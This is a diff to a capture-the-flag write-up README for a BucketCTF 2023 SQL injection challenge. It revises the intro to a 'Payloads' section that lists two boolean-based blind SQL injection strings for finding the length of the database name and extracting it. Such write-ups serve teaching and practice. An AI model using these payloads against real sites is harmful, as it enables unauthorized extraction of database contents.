christiancioffi/CTF_Write-ups/BucketCTF_2023/WEB/SQLi/SQLi-3/README.md

 ## Payloads

-These payloads should be used in loops with different values (as shown in the codes above).
+Here is a summary of all the payloads used in the various phases of the attack.
+These should be used in loops with different values (as shown in the codes above).

 + <code>' OR (SELECT LENGTH(database()))=numeric_value#</code> for the length of the database name;<br>
 + <code>' OR (SELECT SUBSTRING(database(),1,numeric_value))='substring'#</code> for database name;<br>